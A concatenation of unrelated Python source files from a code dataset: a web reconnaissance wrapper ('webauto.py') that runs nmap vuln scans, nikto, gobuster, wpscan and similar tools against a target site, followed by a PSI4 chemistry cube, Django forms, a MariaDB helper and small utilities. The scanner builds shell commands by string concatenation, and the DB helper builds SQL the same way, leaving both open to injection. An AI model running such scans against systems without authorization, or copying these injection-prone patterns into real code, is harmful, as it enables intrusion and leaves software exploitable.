= \"dirb \"\n commands(dirb + site + \"\\n\")\n\ndef whatwebSCAN():\n whatweb = \"whatweb -v \"\n commands(whatweb + site + \"\\n\")\n\ndef wafw00fSCAN():\n wafw00f = \"wafw00f \"\n commands(wafw00f + site + \"\\n\")\n\ndef knockpySCAN():\n knockpy = \"knockpy \"\n commands(knockpy + site + \"\\n\")\n\ndef gobusterSCAN():\n gobuster = \"gobuster dir -u \"\n commands(gobuster + site + \" -w /usr/share/dirb/wordlists/big.txt -t 40 -x .php,.txt,.html\" + \"\\n\")\n\ndef wpscanSCAN():\n wpscan = \"wpscan --url \"\n print (\"...Checking for wordpress...\" + \"\\n\")\n commands(wpscan + site)\n\n# Banners\n\nbanner = \"\"\"\n\n\n██╗ ██╗███████╗██████╗ █████╗ ██╗ ██╗████████╗ ██████╗ \n██║ ██║██╔════╝██╔══██╗ ██╔══██╗██║ ██║╚══██╔══╝██╔═══██╗\n██║ █╗ ██║█████╗ ██████╔╝ ███████║██║ ██║ ██║ ██║ ██║\n██║███╗██║██╔══╝ ██╔══██╗ ██╔══██║██║ ██║ ██║ ██║ ██║\n╚███╔███╔╝███████╗██████╔╝ ██║ ██║╚██████╔╝ ██║ ╚██████╔╝\n ╚══╝╚══╝ ╚══════╝╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═════╝ v0.1\n\nby c0deninja\n\"\"\"\n\ntools = \"\"\"\n--------------------------------------------------------------------------------\n\n████████╗ ██████╗ ██████╗ ██╗ ███████╗\n╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██╔════╝\n ██║ ██║ ██║██║ ██║██║ ███████╗\n ██║ ██║ ██║██║ ██║██║ ╚════██║\n ██║ ╚██████╔╝╚██████╔╝███████╗███████║\n ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝╚══════╝\n\n\"\"\"\n\n\nprint (Fore.WHITE + banner)\n\nsitestatus()\n\nprint (\"\\n\")\n\nprint (tools)\n\n# This script will work best on Kali Linux or Parrot OS\n# Please install the tools that you need before using this script.\n\nprint (Fore.WHITE)\n\ndef commands(cmd):\n try:\n subprocess.check_call(cmd, shell=True)\n except:\n pass\n\n# scanners / tools\n# you can comment out the tools you don't want to use\n\ndef scanning(site):\n start = time.time()\n\n nmapSCAN()\n nmapvulnSCAN()\n niktoSCAN()\n dirbSCAN()\n whatwebSCAN()\n wafw00fSCAN()\n sublist3rSCAN()\n #knockpySCAN()\n gobusterSCAN()\n wpscanSCAN()\n\n end = time.time()\n \n print (\"\\n\")\n print (end - start)\n\nscanning(site)\n","sub_path":"webauto.py","file_name":"webauto.py","file_ext":"py","file_size_in_byte":6074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"291060799","text":"import datetime\nimport tempfile\nimport os\nimport socket\nimport traceback\nfrom sh import which\n\nfrom openeye import oechem\n\nimport psi4\n\nfrom datarecord import OEMolRecord\nfrom floe.api import (\n ParallelMixin,\n StringParameter,\n IntegerParameter,\n BooleanParameter,\n DecimalParameter,\n)\nfrom cuberecord.cubes import OEMolRecordCube, InOutMolFieldMixin\nfrom cuberecord.ports import RecordOutputPort\n\nfrom torsion.utils import get_sd_data, write_energy_profile_to_sddata, save_sddata\nfrom torsion.core import get_dihedral, calculate_energy\n\n\nclass Psi4EnergyCalculation(OEMolRecordCube, InOutMolFieldMixin):\n \"\"\"Calculate the energy using psi4 for a single conformer.\n \"\"\"\n\n title = \"PSI4 Energy Calculation (Serial)\"\n description = \"\"\"Flexible 3rd party QM engine. Allows a variety of calculations, methods and basis sets using\n the trusted DFT code from Dave Sherill's group at Georgia Tech.\"\"\"\n classification = [[\"Energetics\", \"DFT\", \"PSI4\"]]\n tags = [tag for tag_list in classification for tag in tag_list]\n\n system_failure = RecordOutputPort(\"system_failure\")\n\n spe_method = StringParameter(\n \"spe_method\",\n title=\"Method for QM Single-point Energy Calculation\",\n default=\"B3LYP\",\n choices=[\n \"SCF\",\n \"B3LYP\",\n \"B3LYP-D\",\n \"B2PLYP\",\n \"B97\",\n \"B97-D\",\n \"PBE-D\",\n \"CCSD\",\n \"SAPT0\",\n \"MP2\",\n \"MP4\",\n \"HF\",\n \"hf3c\",\n \"hf-d3bj\",\n \"pbeh3c\",\n ],\n description=\"QM method for the final single-point calculation\",\n )\n\n spe_basis = StringParameter(\n \"spe_basis\",\n title=\"Basis Set for QM Single-point Energy Calculation\",\n default=\"6-31G**\",\n choices=[\n None,\n \"cc-pVDZ\",\n \"cc-pVTZ\",\n \"cc-pVQZ\",\n \"aug-cc-pVDZ\",\n \"aug-cc-pVTZ\",\n \"minix\",\n \"sto-3g\",\n \"3-21G\",\n \"6-31G\",\n \"6-31G*\",\n \"6-31G**\",\n \"6-31+G*\",\n \"6-31+G**\",\n \"6-31++G*\",\n \"6-31++G**\",\n \"6-311+G**\",\n ],\n description=\"The basis set for the final single-point calculation\",\n )\n\n geom_opt_technique = StringParameter(\n \"geom_opt_technique\",\n title=\"Type of Geometry Optimization\",\n default=\"QM\",\n choices=[\"None\", \"QM\"],\n )\n\n opt_method = StringParameter(\n \"opt_method\",\n title=\"Method for QM Geometry Optimization\",\n default=\"B3LYP\",\n choices=[\n \"SCF\",\n \"B3LYP\",\n \"B3LYP-D\",\n \"B97\",\n \"B97-D\",\n \"PBE-D\",\n \"CCSD\",\n \"SAPT0\",\n \"MP2\",\n \"MP4\",\n \"HF\",\n \"hf3c\",\n \"hf-d3bj\",\n \"pbeh3c\",\n ],\n description=\"QM method for the initial optimization\",\n )\n\n opt_basis = StringParameter(\n \"opt_basis\",\n title=\"Basis Set for QM Geometry Optimization\",\n default=\"6-31G*\",\n choices=[\n None,\n \"cc-pVDZ\",\n \"cc-pVTZ\",\n \"cc-pVQZ\",\n \"aug-cc-pVDZ\",\n \"aug-cc-pVTZ\",\n \"minix\",\n \"sto-3g\",\n \"3-21G\",\n \"6-31G\",\n \"6-31G*\",\n \"6-31G**\",\n \"6-31+G*\",\n \"6-31+G**\",\n \"6-31++G*\",\n \"6-31++G**\",\n \"6-311+G**\",\n ],\n description=\"The basis set for the initial optimization.\",\n )\n\n geom_maxiter = IntegerParameter(\n \"geom_maxiter\",\n title=\"Maximum number of geometry optimization steps.\",\n default=100,\n min_value=1,\n max_value=1000,\n description=\"\"\"Maximum number of geometry optimization steps.\"\"\",\n )\n\n dft_radial_points = IntegerParameter(\n \"dft_radial_points\",\n title=\"DFT Grid Radial Points\",\n default=50,\n min_value=25,\n max_value=500,\n description=\"\"\"Parameter controls the radial density of the DFT grid. DFT calculation speeds are very\n sensitive to this parameter.\"\"\",\n )\n\n dft_spherical_points = IntegerParameter(\n \"dft_spherical_points\",\n title=\"DFT GRid Spherical Points\",\n default=194,\n min_value=25,\n max_value=500,\n description=\"\"\"Parameter controls the spherical density of the DFT grid. DFT calculation speeds are sensitive\n to this parameter.\"\"\",\n )\n\n num_processors = IntegerParameter(\n \"num_processors\",\n title=\"Number of Processors\",\n default=1,\n min_value=0,\n max_value=32,\n help_text=\"\"\"Number of processors 1-32 (0 indicates to use all the processors on the machine). This is the\n Number of processors for each Orion worker instance. Unless your Orion worker instances have\n been setup to avoid sharing resources, the should remain set at 1.\"\"\",\n )\n\n guess_basis = BooleanParameter(\n \"guess_basis\",\n title=\"Basis set guess\",\n required=False,\n default=False,\n help_text=\"\"\"Psi4 advanced parameter: Accelerate convergence by performing a preliminary scf with this small \n basis set followed by projection into the full target basis. A value of TRUE turns on projection using the \n 3-21G small basis set.\n http://www.psicode.org/psi4manual/master/autodir_options_c/scf__basis_guess.html\"\"\",\n )\n\n use_soscf = BooleanParameter(\n \"use_soscf\",\n title=\"Use Second-Order SCF\",\n required=False,\n default=False,\n help_text=\"\"\"Psi4 advance parameter: Do use second-order SCF convergence methods?\n http://www.psicode.org/psi4manual/master/autodir_options_c/scf__soscf.html\"\"\",\n )\n\n scf_type = StringParameter(\n \"scf_type\",\n title=\"SCF Type\",\n required=False,\n default=\"DIRECT\",\n choices=[\"DIRECT\", \"DF\", \"PK\", \"OUT_OF_CORE\", \"PS\", \"INDEPENDENT\", \"GTFOCK\"],\n help_text=\"\"\"Psi4 parameter: SCF Type.\n \"\"\",\n )\n\n only_selected_conformer = BooleanParameter(\n \"only_selected_conformer\",\n title=\"Calculate Energy only for a selected conformer\",\n default=False,\n help_text=\"\"\"If this is set, energy is calculated only for a single \n conformer of each OEMol passed as input to this cube. The conformer for\n which the energy is calculated is determined by the 'SELECTED_CONFORMER'\n integer data tag on the OEMol.\"\"\",\n )\n\n molden_output = BooleanParameter(\n \"molden_output\",\n title=\"Attach electronic wave function from molden file as SD data\",\n default=False,\n help_text=\"\"\"If this is set, electronic wave function from\n molden file will be attached as SD data.\"\"\",\n )\n\n g_convergence = StringParameter(\n \"g_convergence\",\n title=\"Psi4 g_convergence parameter\",\n default=\"QCHEM\",\n choices=[\n \"QCHEM\",\n \"MOLPRO\",\n \"GAU\",\n \"GAU_LOOSE\",\n \"GAU_TIGHT\",\n \"INTERFRAG_TIGHT\",\n \"GAU_VERYTIGHT\",\n \"TURBOMOLE\",\n \"CFOUR\",\n \"NWCHEM_LOOSE\",\n ],\n help_text=\"\"\"Allows selection of a psi4 convergence criteria. See: http://www.psicode.org/psi4manual/master/autodoc_glossary_options_c.html#term-g-convergence-optking\"\"\",\n )\n\n max_disp_g_convergence = DecimalParameter(\n \"max_disp_g_convergence\",\n title=\"Psi4 max_disp_g_convergence parameter\",\n default=1.2e-3,\n help_text=\"\"\"Psi4 Maximum displacement convergence criteria. NOTE: For loose optimization, try 5.0e-2.\"\"\",\n )\n\n def begin(self):\n psi_path = which(\"psi4\")\n psi_path, tail = os.path.split(psi_path)\n psi_path, tail = os.path.split(psi_path)\n os.environ[\"PSI\"] = psi_path\n conda_path = \"/\".join(psi_path.split(\"/\")[:-1])\n os.environ[\"PSIPATH\"] = psi_path\n\n os.environ[\"PSI_SCRATCH\"] = tempfile.gettempdir()\n os.environ[\"PSI_SCRATCH_LOCAL\"] = tempfile.mkdtemp()\n\n psi4.set_memory(\"1 GB\")\n\n self.basis_guess_str = \"false\"\n if (\n self.args.guess_basis\n and self.args.spe_basis not in [\"sto-3g\", \"3-21G\", \"minix\"]\n and self.args.opt_basis not in [\"3-21G\", \"sto-3g\", \"minix\"]\n ):\n self.basis_guess_str = \"true\"\n\n self.use_soscf_str = \"false\"\n if (\n self.args.use_soscf\n and self.args.spe_basis not in [\"sto-3g\", \"3-21G\", \"minix\"]\n and self.args.opt_basis not in [\"3-21G\", \"sto-3g\", \"minix\"]\n ):\n self.use_soscf_str = \"true\"\n\n self.psi4opts = {\n \"scf_type\": self.args.scf_type,\n \"fail_on_maxiter\": \"false\",\n \"guess_basis\": self.basis_guess_str,\n \"use_soscf\": self.use_soscf_str,\n \"dft_radial_points\": self.args.dft_radial_points,\n \"dft_spherical_points\": self.args.dft_spherical_points,\n \"num_processors\": self.args.num_processors,\n \"g_convergence\": self.args.g_convergence,\n \"max_disp_g_convergence\": self.args.max_disp_g_convergence,\n }\n\n def end(self):\n if os.path.exists(os.environ[\"PSI_SCRATCH_LOCAL\"]):\n os.rmdir(os.environ[\"PSI_SCRATCH_LOCAL\"])\n\n def process(self, record, port):\n if record.has_value(self.args.in_mol_field):\n mol = record.get_value(self.args.in_mol_field)\n else:\n self.log.error(\"Could not find molecules in OEMolRecord\")\n self.failure.emit(record)\n return\n\n parent_torsion_tag = \"TORSION_ATOMS_ParentMol\"\n torsion_atoms_in_parent = get_sd_data(mol, parent_torsion_tag).split()\n dih_name = mol.GetTitle() + \"_\" + \"_\".join(torsion_atoms_in_parent)\n\n torsion_tag = \"TORSION_ATOMS_FRAGMENT\"\n torsion_atoms_in_fragment = get_sd_data(mol, torsion_tag).split()\n dihedral_atom_indices = [int(x) - 1 for x in torsion_atoms_in_fragment]\n if dihedral_atom_indices is None:\n self.log.warn(\"Unable to find labelled torsion in %s\" % dih_name)\n self.failure.emit(record)\n return\n\n opt_basis = self.args.opt_basis\n spe_basis = self.args.spe_basis\n\n # If fragment contains S\n # use 6-31+G* instead of 6-31G*\n # use 6-31+G** instead of 6-31G**\n need_diffuse = False\n if oechem.OECount(mol, oechem.OEIsSulfur()) > 0:\n need_diffuse = True\n\n for atom in mol.GetAtoms(oechem.OEIsHeavy()):\n if atom.GetFormalCharge() < 0:\n need_diffuse = True\n\n if need_diffuse:\n if opt_basis == \"6-31G*\":\n self.log.warn(\n \"Using 6-31+G* instead of 6-31G* as opt basis because fragment contains S.\"\n )\n opt_basis = \"6-31+G*\"\n\n if spe_basis == \"6-31G*\":\n self.log.warn(\n \"Using 6-31+G* instead of 6-31G* as spe basis because fragment contains S.\"\n )\n spe_basis = \"6-31+G*\"\n\n if opt_basis == \"6-31G**\":\n self.log.warn(\n \"Using 6-31+G** instead of 6-31G** as opt basis because fragment contains S.\"\n )\n opt_basis = \"6-31+G**\"\n\n if spe_basis == \"6-31G**\":\n self.log.warn(\n \"Using 6-31+G** instead of 6-31G** as spe basis because fragment contains S.\"\n )\n spe_basis = \"6-31+G**\"\n\n try:\n if self.args.only_selected_conformer:\n conf_selection_tag = \"SELECTED_CONFORMER\"\n key_conf_id = mol.GetIntData(conf_selection_tag)\n for conf in mol.GetConfs():\n if conf.GetIdx() != key_conf_id:\n continue\n conf_name = get_sd_data(conf, \"CONFORMER_LABEL\")\n else:\n conf_name = get_sd_data(mol, \"CONFORMER_LABEL\")\n time_stamp = \"{:%Y-%m-%d %H:%M:%S}\".format(datetime.datetime.now())\n hostname = socket.gethostname()\n self.log.info(\n \"Starting psi4 calculation for %s on %s at %s\"\n % (conf_name, hostname, time_stamp)\n )\n\n if self.args.only_selected_conformer:\n oechem.OESetSDData(conf, \"%s start time\" % self.name, time_stamp)\n else:\n oechem.OESetSDData(mol, \"%s start time\" % self.name, time_stamp)\n\n dih, _ = get_dihedral(mol, dihedral_atom_indices)\n calculate_energy(\n mol,\n dih,\n spe_method=self.args.spe_method,\n spe_basis=spe_basis,\n geom_opt_technique=self.args.geom_opt_technique,\n opt_method=self.args.opt_method,\n opt_basis=opt_basis,\n geom_maxiter=self.args.geom_maxiter,\n only_selected_conf=self.args.only_selected_conformer,\n molden_output=self.args.molden_output,\n **self.psi4opts\n )\n\n if self.args.only_selected_conformer:\n conf_selection_tag = \"SELECTED_CONFORMER\"\n key_conf_id = mol.GetIntData(conf_selection_tag)\n for conf in mol.GetConfs():\n if conf.GetIdx() != key_conf_id:\n continue\n conf_name = get_sd_data(conf, \"CONFORMER_LABEL\")\n else:\n conf_name = get_sd_data(mol, \"CONFORMER_LABEL\")\n time_stamp = \"{:%Y-%m-%d %H:%M:%S}\".format(datetime.datetime.now())\n hostname = socket.gethostname()\n self.log.info(\n \"Completed psi4 calculation for %s on %s at %s\"\n % (conf_name, hostname, time_stamp)\n )\n\n if self.args.only_selected_conformer:\n oechem.OESetSDData(conf, \"%s end time\" % self.name, time_stamp)\n else:\n oechem.OESetSDData(mol, \"%s end time\" % self.name, time_stamp)\n\n optimized_mol_record = OEMolRecord()\n optimized_mol_record.set_mol(mol)\n self.success.emit(optimized_mol_record)\n except Exception as e:\n print(e)\n # traceback.print_stack()\n self.log.error(\"Error with {} {}\".format(mol.GetTitle(), e))\n self.failure.emit(record)\n\n\nclass ParallelPsi4EnergyCalculation(ParallelMixin, Psi4EnergyCalculation):\n title = \"Calculate Psi4 Energy (Parallel)\"\n\n parameter_overrides = {\n \"prefetch_count\": {\"default\": 1}, # 1 molecule at a time\n \"item_timeout\": {\n \"default\": 43200.0\n }, # Default 12 hour limit (units are seconds)\n \"item_count\": {\"default\": 1}, # 1 molecule at a time\n \"max_failures\": {\"default\": 1}, # only 1 failure permitted\n }\n\n def process_failed(self, data, port, last_error):\n print(\n \"Parallel cube failed to process {} from {} with error: {}\".format(\n data, port, last_error\n )\n )\n self.system_failure.emit(data)\n","sub_path":"torsion/cubes/calculate_energy.py","file_name":"calculate_energy.py","file_ext":"py","file_size_in_byte":15410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"559744137","text":"\"\"\"\nHere we define a form for allowing site users to submit a potential FAQ that\nthey would like to see added.\n\nFrom the user's perspective the question is not added automatically, but\nactually it is, only it is added as inactive.\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom django import forms\nfrom .models import Experiment, Inventory, Herb, Peptide\n\nfrom suit.widgets import SuitDateWidget, SuitTimeWidget, SuitSplitDateTimeWidget, AutosizedTextarea, HTML5Input\nfrom .widget import AdvancedThumbnailImageWidget, ScientificNameWidget, FormDateWidget\nfrom django.forms.widgets import ClearableFileInput\n\nfrom django.contrib.admin.widgets import AdminDateWidget\nfrom django.forms.extras.widgets import SelectDateWidget\nfrom tinymce.widgets import TinyMCE\n\nclass InventoryForm(forms.ModelForm):\n class Meta:\n model = Inventory\n fields = ['herb', 'supplier', 'storage_location', 'price', 'purchase_quantity', 'processing_method', 'remarks']\n widgets = {\n #'date_of_update': FormDateWidget,\n #'expire_date': FormDateWidget,\n #'date_of_receive': FormDateWidget,\n 'remarks': forms.Textarea(attrs={'rows':5}),\n }\n\n\nclass ExperimentForm(forms.ModelForm):\n class Meta:\n model = Experiment\n exclude = ['uploaded_by', 'created_time']\n widgets = {\n 'description': forms.Textarea(attrs={'rows':5, 'cols':25}),\n 'condition': forms.Textarea(attrs={'rows':5, 'cols':25}),\n 'remarks': forms.Textarea(attrs={'rows':5, 'cols':25}),\n #'parameter': forms.Textarea(attrs={'rows':2, 'cols':25}),\n 'experiment_time': FormDateWidget,\n }\n\n\nclass HerbForm(forms.ModelForm):\n class Meta:\n model = Herb\n fields = ['scientific_name', 'common_name', 'literature', 'remarks']\n widgets = {\n #'image': AdvancedThumbnailImageWidget,\n 'scientific_name': ScientificNameWidget(attrs={'width': 125}),\n 'literature': forms.Textarea(attrs={'rows':5, 'cols':25}),\n 'remarks': forms.Textarea(attrs={'rows':5, 'cols':25}),\n #'remarks': AutosizedTextarea(attrs={'rows': 3}),\n }\n\n\nclass PeptideForm(forms.ModelForm):\n class Meta:\n model = Peptide\n fields = ['sample_name', 'description', 'extraction_method', 'synthesis_method', 'sequence', 'structure_text',\n 'structure_picture', 'structure_link', 'quantity', 'owner', 'unit', 'notebook_number', 'origin', 'storage_method', 'storage_location',\n 'hplc_data_text', 'hplc_data_file', 'ms_data_text', 'ms_data_file', 'remarks', 'remarks_file']\n widgets = {\n 'structure_picture': AdvancedThumbnailImageWidget,\n 'description': forms.Textarea(attrs={'rows':5, 'cols':25}),\n 'literature': forms.Textarea(attrs={'rows':5, 'cols':25}),\n 'remarks': forms.Textarea(attrs={'rows':5, 'cols':25}),\n 'sequence': TinyMCE(attrs={'cols': 25, 'rows': 1}),\n #'remarks': AutosizedTextarea(attrs={'rows': 3}),\n }","sub_path":"herbprofile/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"334341686","text":"from Прочее.truck import Truck\n\n\nclass NotMachineLikeTruckAcceptableInGarage(Exception):\n\n text = '''\n !!!!!!!!!!!!!!!!!!!!!!\n !!!!!! Only trucks are acceptable to be parked in this garage {} !!!!!!!!!!!!\n !!!!!!!!!!!!!!!!!!!!!!\n '''\n\n def __init__(self, message):\n self.message = NotMachineLikeTruckAcceptableInGarage.text.format(message)\n\nclass NotVolvoFMXInBox(NotMachineLikeTruckAcceptableInGarage):\n\n text = '''!!!!!!!!!!!!!!!!!!!!!!!\n !!!!!!!!!!!! One or more trucks you have parked are not VolvoFMX model !!!!!!!!!!!!!\n !!!!!!!!!!!!!!!!!!!!!!!!!!!!\n '''\n\n def __init__(self, message):\n self.message = NotVolvoFMXInBox.text.format(message)\n\nclass NotVolvoFEInBox(NotMachineLikeTruckAcceptableInGarage):\n\n text = '''!!!!!!!!!!!!!!!!!!!!!!!\n !!!!!!!!!!!! One or more trucks you have parked are not VolvoFE model !!!!!!!!!!!!!\n !!!!!!!!!!!!!!!!!!!!!!!!!!!!\n '''\n\n def __init__(self, message):\n self.message = NotVolvoFEInBox.text.format(message)\n\nclass Garage:\n\n def __init__(self, number, volume, list1, list2):\n self.number = number\n self.volume = volume\n self.cars_list = list1\n self.trucks_list = list2\n\n def setTrucks(self, trucks):\n for truck in trucks:\n if (isinstance(truck, Truck)):#Если у нас грузовик, то мы добавляем его в список\n self.trucks_list.append(truck)\n else:\n raise NotMachineLikeTruckAcceptableInGarage(truck.type)\n\nclass Garage_Box(Garage):\n\n def __init__(self, number, list1):\n self.number = number\n self.trucks_list = list1\n\n def setVolvoFMXBox(self, trucks):\n for truck in trucks:\n if(isinstance(Truck.model, FMX)):\n self.trucks_list.append(truck)\n else:\n raise NotVolvoFMXInBox(truck.model)\n\n def setVolvoFEBox(self, trucks):\n for truck in trucks:\n if(isinstance(Truck.model, FE)):\n self.trucks_list.append(truck)\n else:\n raise NotVolvoFEInBox(truck.model)\n\n\n\n","sub_path":"M.Shirinskiy/Garage/Garage.py","file_name":"Garage.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"346199190","text":"def gen_convert_command(x):\n fcodes = [\"phv\", \"jvn\", \"cs\", \"cm\", \"\"]\n svg = '.svg'\n size = 256\n for code in fcodes:\n ccode = code + svg\n if ( len(ccode) < len(x)):\n diff = len(x) - len(ccode)\n ext = x[diff:]\n if (ccode == ext):\n fromName = x\n toName = x[:diff];\n if code: toName += '_'+ code\n toName += '.png'\n #inkscape -z -e test.png -w 1024 -h 1024 test.svg\n #cmd = \"convert %s %s\"%(fromName, toName)\n cmd = 'inkscape -z -e \"pngs/%s\" -w %d \"%s\" -y 1.0 -b #ffffff'%(toName, size, fromName)\n return cmd\n return 'echo \"Do nothing\"'\n\n\n\nfnames = open(\"files.list\", \"r\")\nnames = list(map(lambda x: x.strip(), fnames))\n\ncmds = list(map(gen_convert_command, names))\nfor cmd in cmds:\n print(cmd)\n\n\n","sub_path":"sandbox/images/rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"213761698","text":"import sys\nimport time\nfrom datetime import datetime\nfrom time import mktime\nfrom typing import List, Tuple\n\nimport mariadb\n\nfrom config import Cfg\n\n\nclass Db(Cfg):\n\n rz_conn = None # TO-DO: make a typing on db Connection\n gz_conn = None # TO-DO: make a typing on db Connection\n\n def __init__(self):\n \"\"\"\n Create an instance of the configurationfile\n \"\"\"\n super(Db, self).__init__()\n self.gz_conn = self._db_conn(\n user=self.user,\n password=self.password,\n host=self.host,\n port_str=self.port,\n database=self.gz_db,\n )\n self.rz_conn = self._db_conn(\n user=self.user,\n password=self.password,\n host=self.host,\n port_str=self.port,\n database=self.rz_db,\n )\n\n def _db_conn(\n self, user: str, password: str, host: str, port_str: str, database: str\n ):\n \"\"\"\n Establish connection to mariadb platform\n \"\"\"\n try:\n conn = mariadb.connect(\n user=user,\n password=password,\n host=host,\n port=int(port_str),\n database=database,\n )\n except mariadb.Error as e:\n print(f\"Error connecting to MariaDB Platform: {e}\")\n sys.exit(1)\n return conn\n\n def get_device_variables_by_name(self, device_name: str):\n # Get Cursor\n result: List[str] = []\n cur = self.gz_conn.cursor()\n\n query = f\"\"\"\n SELECT v.name\n FROM device d, variable v, device_variable dv\n WHERE\n d.device_id = dv.device_id\n and dv.variable_id = v.variable_id\n AND d.name = '{device_name}'\n \"\"\"\n # Read devices of database\n cur.execute(query)\n query_result = cur.fetchall()\n for item in query_result:\n result.append(item[0])\n # Convert to list\n\n return result\n\n def get_devices_all(self):\n # Get Cursor\n cur = self.gz_conn.cursor()\n # Read devices of database\n cur.execute(\"SELECT * FROM device\")\n result = cur.fetchall()\n return result\n\n def get_device_data_by_name(self, device_name: str):\n # Get Cursor\n cur = self.gz_conn.cursor() # TO-DO: typing for cursor variable\n # Read devices of database\n query: str = f\"SELECT * FROM device WHERE name = '{device_name}'\"\n\n cur.execute(query)\n r = cur.fetchone() # TO-DO: typing this tuple\n\n d: dict[str:str] = {\n \"name\": r[1],\n \"brand\": r[2],\n \"model\": r[3],\n \"ext_device_id\": r[4],\n \"url\": r[5],\n \"access_token\": r[6],\n }\n\n return d\n\n def write_climate_logger_device_data(\n self, ext_device_id: str, timestamp_str: str, temperature: int, humidity: int\n ):\n\n # convert timestap to datetime\n timestamp: datetime = datetime.fromtimestamp(\n mktime(time.strptime(timestamp_str, \"%a %b %d %H:%M:%S %Y\"))\n )\n\n # Get Cursor\n cur = self.rz_conn.cursor()\n query: str = f\"\"\"\n INSERT INTO climatedata (ext_device_id, timestamp, temperature, humidity)\n VALUES ('{ext_device_id}', '{timestamp.strftime('%Y-%m-%d %H:%M:%S')}', {float(temperature)}, {float(humidity)})\n \"\"\"\n cur.execute(query)\n cur.execute(\"COMMIT\")\n\n\nif __name__ == \"__main__\":\n DB = Db()\n print(DB.get_device_data_by_name(\"climate-logger-01\"))\n","sub_path":"src/dbbase.py","file_name":"dbbase.py","file_ext":"py","file_size_in_byte":3582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"69271812","text":"#!/usr/bin/env python3\n\n# https://codeforces.com/problemset/problem/1353/A\n# 最大的放一个,两边各一个0?\n\nt = int(input())\nfor _ in range(t):\n n,m = list(map(int,input().split()))\n l = [0,m,m<<1]\n print(l[n-1] if n<=2 else l[2])\n","sub_path":"codeforces/math数学/800/1353A最大化相邻差.py","file_name":"1353A最大化相邻差.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"110335881","text":"\n# @Title: LRU 缓存机制 (LRU Cache)\n# @Author: 18015528893\n# @Date: 2021-02-28 17:17:13\n# @Runtime: 196 ms\n# @Memory: 23.4 MB\n\nclass Node:\n \n def __init__(self, key, val):\n self.key = key\n self.val = val\n self.next = None\n self.prev = None\n\n\nclass DoubleList:\n\n def __init__(self):\n self.head = Node(0, 0)\n self.tail = Node(0, 0)\n self.head.next = self.tail\n self.tail.prev = self.head\n self.size = 0\n\n def remove(self, node):\n node.prev.next = node.next\n node.next.prev = node.prev\n self.size -= 1\n \n def remove_first(self):\n if self.head.next == self.tail:\n return\n first = self.head.next\n self.remove(first)\n return first\n\n def add_last(self, node):\n node.prev = self.tail.prev\n node.next = self.tail\n node.prev.next = node\n self.tail.prev = node\n self.size += 1\n\n\nclass LRUCache:\n\n def __init__(self, capacity: int):\n self.map = dict()\n self.cache = DoubleList()\n self.capacity = capacity \n\n def get(self, key: int) -> int:\n if key not in self.map:\n return -1\n self.make_recent(key)\n return self.map[key].val\n\n def put(self, key: int, value: int) -> None:\n if key in self.map:\n self.delete_key(key)\n self.add_recent(key, value)\n return\n \n if self.capacity == len(self.map):\n self.remove_least_recent()\n\n self.add_recent(key, value)\n\n def make_recent(self, key):\n node = self.map[key]\n self.cache.remove(node)\n self.cache.add_last(node)\n \n def add_recent(self, key, val):\n node = Node(key, val)\n self.cache.add_last(node)\n self.map[key] = node\n\n def delete_key(self, key):\n node = self.map[key]\n self.cache.remove(node)\n del self.map[key]\n \n def remove_least_recent(self):\n node = self.cache.remove_first()\n del self.map[node.key]\n\n# Your LRUCache object will be instantiated and called as such:\n# obj = LRUCache(capacity)\n# param_1 = obj.get(key)\n# obj.put(key,value)\n","sub_path":"Problemset/lru-cache/lru-cache.py","file_name":"lru-cache.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"483880178","text":"from Utils.POSE3 import Pose3\nimport subprocess\nimport os\nimport json\nfrom Feature2D.SIFTFeature import *\nfrom pytypes import override\nimport cv2\nimport typing\n\n\nclass PnPBase(object):\n __metaclass__ = abc.ABCMeta\n\n def __init__(self) -> None:\n pass\n\n def getPoseRef2Cur(self, refImg : np.ndarray, curImg: np.ndarray, curImg_depth:np.ndarray, K: np.ndarray) -> (Pose3, np.ndarray, np.ndarray):\n pose = Pose3()\n p_ref, p_cur = None, None\n return pose, p_ref, p_cur\n\nclass PnP_CV(PnPBase):\n def __init__(self):\n super(PnP_CV, self).__init__()\n\n def get3dPoint(cls, imgpt, depth, K):\n imgpt_homo = np.matrix([imgpt[0], imgpt[1], 1]).T\n K_i = np.matrix(K).I\n pt3d = (K_i * imgpt_homo * depth).ravel()\n return pt3d\n\n def get3dPoints(cls, ref_pts, cur_pts, curImg_depth, K):\n # get valid data\n valid_ref_pts = []\n valid_cur_pts = []\n valid_cur_depth = []\n for i in range(0, len(ref_pts)):\n x = int(cur_pts[i, 0])\n y = int(cur_pts[i, 1])\n if curImg_depth[y, x] == 0: # invalid depth\n continue\n valid_ref_pts.append(ref_pts[i])\n valid_cur_pts.append(cur_pts[i])\n valid_cur_depth.append(curImg_depth[y, x]) # note: first y:height , then x:width\n\n # conver 2d image points to 3d points\n valid_cur_pts3d = []\n for i in range(0, len(valid_cur_pts)):\n pt3d = cls.get3dPoint(valid_cur_pts[i], valid_cur_depth[i], K)\n valid_cur_pts3d.append(pt3d)\n\n return np.float32(valid_ref_pts), np.float32(valid_cur_pts), np.float32(valid_cur_pts3d)\n\n # @override\n def getPoseRef2Cur(self, refImg: np.ndarray, curImg: np.ndarray, curImg_depth: np.ndarray, K: np.ndarray):\n ref_pts, cur_pts = SIFTFeature.detectAndMatch(image1=refImg,image2=curImg)\n ref_pts_2d, cur_pts_2d, cur_pts_3d = self.get3dPoints(ref_pts, cur_pts, curImg_depth, K)\n\n # 